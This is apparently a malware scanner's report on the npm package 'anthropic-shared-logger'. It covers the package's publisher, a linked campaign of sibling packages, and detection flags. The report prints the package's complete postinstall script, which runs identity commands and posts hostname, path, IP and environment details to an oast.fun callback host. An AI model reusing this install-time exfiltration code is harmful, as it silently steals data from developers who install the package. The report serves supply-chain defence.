// npm package

anthropic-shared-logger

Full RCE PoC - Alex Birsan Style

npmjs.com tarball

versions

maintainers

first publish

2026-05-20

publisher

dewifewi

tarball

1,045 B

AUTO-PUBLISHED·1 version indexed·latest published 2026-05-20

// exfil path

what is read → where it ships

steals

○ home dir
○ system info

sends to

⇢ lszakfghwnvxspyfcmaabd1css99rnq3w.oast.fun(oast.fun)
⚙ dns tunneling(fetches + executes remote payload)

// publisher campaignby dewifewi

5 caught packages from this account

This is not an isolated catch. The same publisher has shipped 4 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.

// offending code· @8.0.5· 1 file flagged

llm: malicious · 0.95

→ Sends to suspicious destination(s): lszakfghwnvxspyfcmaabd1css99rnq3w.oast.fun.

@8.0.5·2026-05-20·AUTO-PUBLISHED·publisher: dewifewi
heuristic 100/100
static flags 6
llm malicious (0.95) via ollama
install-scripts:postinstallnew-publisher:1dfirst-version-of-packagesuspicious-description:pocpublisher-multi-name-burst:3publisher-version-pump:12reads-env-varsreads-homedirreads-system-infodns-tunnelingchild-process-spawndest-via-hostname-var
→ Sends to suspicious destination(s): lszakfghwnvxspyfcmaabd1css99rnq3w.oast.fun.
// NHI intent2 targets·

--- install scripts --- ### postinstall node -e "const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'anthropic-shared-logger', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'lszakfghwnvxspyfcmaabd1css99rnq3w.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });" --- package/package.json (excerpt) --- { "name": "anthropic-shared-logger", "version": "8.0.5", "description": "Full RCE PoC - Alex Birsan Style", "main": "index.js", "scripts": { "postinstall": "node -e \"const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'anthropic-shared-logger', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'lszakfghwnvxspyfcmaabd1css99rnq3w.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });\"" } } --- dynamic destinations --- → lszakfghwnvxspyfcmaabd1css99rnq3w.oast.fun (via hostname-var)